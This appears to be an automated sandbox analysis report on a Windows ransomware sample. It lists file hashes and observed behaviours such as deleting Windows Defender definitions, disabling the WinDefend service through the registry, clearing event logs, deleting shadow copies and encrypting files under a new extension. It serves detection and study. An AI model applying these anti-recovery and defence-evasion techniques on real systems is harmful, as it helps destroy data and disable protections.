Analysis
-
max time kernel
119s -
max time network
209s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:51
Static task
static1
Behavioral task
behavioral1
Sample
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
Resource
win10-en-20211208
General
-
Target
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
-
Size
2.6MB
-
MD5
ca7878f1271bb808e628f7ebb84bcc1f
-
SHA1
8f7713d0519be5c75453b3028ff7baa564fe84c1
-
SHA256
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216
-
SHA512
58bf1728467eb32d94be1be4e70d3ca97e0eb21d9fd375d5e567a908ce4a5a2473e4e6e0ebecb57152a4fb6eec137d1a3e843a45cd0eabc1d55f704e42c3a3f4
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3628 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3164 bcdedit.exe 1512 bcdedit.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File renamed C:\Users\Admin\Pictures\ExpandReceive.raw => C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File renamed C:\Users\Admin\Pictures\DenyRegister.crw => C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87__wC6eB5YWEE0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-16_altform-unplated_contrast-black.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-125.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-white_scale-125.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Spider\ResPacks\gameplayspider.respack ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.winmd ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-200.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_dcgBmfxmWl00.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_C8hEF4maxwY0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\FileSystemMetadata.xml.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JdLAFUBxR6A0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\28.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-black.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_o6Id7afySdo0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YrL2geyrNdQ0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200_contrast-high.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_ed4FFgOCwYU0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Apply.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_7BdU5xsWnHE0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-150.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache-Dark.scale-180.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-125.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Square310x310\PaintLargeTile.scale-200.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\en-US.PhoneNumber.SMS.ot ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Offihub_Base_PriInfo.pri.xml ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\office.odf ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\LargeTile.scale-100.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-64.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\TipTsf.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_vGlQbTDe_eA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHM.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_9e4IhdhiV-A0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSplashScreen.contrast-white_scale-125.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3899_20x20x32.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_QFvrhcF9rnA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_lpix8Hdz0uM0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\11c.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_l9E0Jab9COg0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_rOY6T56VlLw0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-400.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\de-DE\rtscom.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_11c.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_tGR5Kj9ys-40.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_g_TtoKPC3vE0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_f3mmh6fc3Hs0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-100.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_8IYU2qy_QEI0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_h8pTF9MYoGY0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSplashScreen.scale-200.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_eYJru2nTx480.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\_Resources\4.rsrc ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleSplashScreen.scale-200.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_x2hW4msd8_o0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3569_20x20x32.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_mtRDmiY2hfQ0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YkDFdXDizLE0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_RC9Suxq_6jw0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxBlockMap.xml ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\shape_hexagon.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3528 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.execcbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exepid process 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 3368 powershell.exe 3368 powershell.exe 3368 powershell.exe 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3676 wevtutil.exe Token: SeBackupPrivilege 3676 wevtutil.exe Token: SeSecurityPrivilege 3712 wevtutil.exe Token: SeBackupPrivilege 3712 wevtutil.exe Token: SeSecurityPrivilege 2256 wevtutil.exe Token: SeBackupPrivilege 2256 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3896 wmic.exe Token: SeSecurityPrivilege 3896 wmic.exe Token: SeTakeOwnershipPrivilege 3896 wmic.exe Token: SeLoadDriverPrivilege 3896 wmic.exe Token: SeSystemProfilePrivilege 3896 wmic.exe Token: SeSystemtimePrivilege 3896 wmic.exe Token: SeProfSingleProcessPrivilege 3896 wmic.exe Token: SeIncBasePriorityPrivilege 3896 wmic.exe Token: SeCreatePagefilePrivilege 3896 wmic.exe Token: SeBackupPrivilege 3896 wmic.exe Token: SeRestorePrivilege 3896 wmic.exe Token: SeShutdownPrivilege 3896 wmic.exe Token: SeDebugPrivilege 3896 wmic.exe Token: SeSystemEnvironmentPrivilege 3896 wmic.exe Token: SeRemoteShutdownPrivilege 3896 wmic.exe Token: SeUndockPrivilege 3896 wmic.exe Token: SeManageVolumePrivilege 3896 wmic.exe Token: 33 3896 wmic.exe Token: 34 3896 wmic.exe Token: 35 3896 wmic.exe Token: 36 3896 wmic.exe Token: SeIncreaseQuotaPrivilege 3532 wmic.exe Token: SeSecurityPrivilege 3532 wmic.exe Token: SeTakeOwnershipPrivilege 3532 wmic.exe Token: SeLoadDriverPrivilege 3532 wmic.exe Token: SeSystemProfilePrivilege 3532 wmic.exe Token: SeSystemtimePrivilege 3532 wmic.exe Token: SeProfSingleProcessPrivilege 3532 wmic.exe Token: SeIncBasePriorityPrivilege 3532 wmic.exe Token: SeCreatePagefilePrivilege 3532 wmic.exe Token: SeBackupPrivilege 3532 wmic.exe Token: SeRestorePrivilege 3532 wmic.exe Token: SeShutdownPrivilege 3532 wmic.exe Token: SeDebugPrivilege 3532 wmic.exe Token: SeSystemEnvironmentPrivilege 3532 wmic.exe Token: SeRemoteShutdownPrivilege 3532 wmic.exe Token: SeUndockPrivilege 3532 wmic.exe Token: SeManageVolumePrivilege 3532 wmic.exe Token: 33 3532 wmic.exe Token: 34 3532 wmic.exe Token: 35 3532 wmic.exe Token: 36 3532 wmic.exe Token: SeIncreaseQuotaPrivilege 3532 wmic.exe Token: SeSecurityPrivilege 3532 wmic.exe Token: SeTakeOwnershipPrivilege 3532 wmic.exe Token: SeLoadDriverPrivilege 3532 wmic.exe Token: SeSystemProfilePrivilege 3532 wmic.exe Token: SeSystemtimePrivilege 3532 wmic.exe Token: SeProfSingleProcessPrivilege 3532 wmic.exe Token: SeIncBasePriorityPrivilege 3532 wmic.exe Token: SeCreatePagefilePrivilege 3532 wmic.exe Token: SeBackupPrivilege 3532 wmic.exe Token: SeRestorePrivilege 3532 wmic.exe Token: SeShutdownPrivilege 3532 wmic.exe Token: SeDebugPrivilege 3532 wmic.exe Token: SeSystemEnvironmentPrivilege 3532 wmic.exe Token: SeRemoteShutdownPrivilege 3532 wmic.exe Token: SeUndockPrivilege 3532 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2224 wrote to memory of 2776 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 2776 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2776 wrote to memory of 3152 2776 net.exe net1.exe PID 2776 wrote to memory of 3152 2776 net.exe net1.exe PID 2224 wrote to memory of 3688 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 3688 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 3688 wrote to memory of 1336 3688 net.exe net1.exe PID 3688 wrote to memory of 1336 3688 net.exe net1.exe PID 2224 wrote to memory of 1208 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 1208 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1208 wrote to memory of 932 1208 net.exe net1.exe PID 1208 wrote to memory of 932 1208 net.exe net1.exe PID 2224 wrote to memory of 2004 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 2004 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2004 wrote to memory of 3164 2004 net.exe net1.exe PID 2004 wrote to memory of 3164 2004 net.exe net1.exe PID 2224 wrote to memory of 652 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 652 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 652 wrote to memory of 3972 652 net.exe net1.exe PID 652 wrote to memory of 3972 652 net.exe net1.exe PID 2224 wrote to memory of 4012 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 4012 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 4012 wrote to memory of 3604 4012 net.exe net1.exe PID 4012 wrote to memory of 3604 4012 net.exe net1.exe PID 2224 wrote to memory of 4004 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 4004 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 4004 wrote to memory of 1480 4004 net.exe net1.exe PID 4004 wrote to memory of 1480 4004 net.exe net1.exe PID 2224 wrote to memory of 2832 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 2832 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2832 wrote to memory of 212 2832 net.exe net1.exe PID 2832 wrote to memory of 212 2832 net.exe net1.exe PID 2224 wrote to memory of 3500 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2224 wrote to memory of 3500 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 3500 wrote to memory of 668 3500 net.exe net1.exe 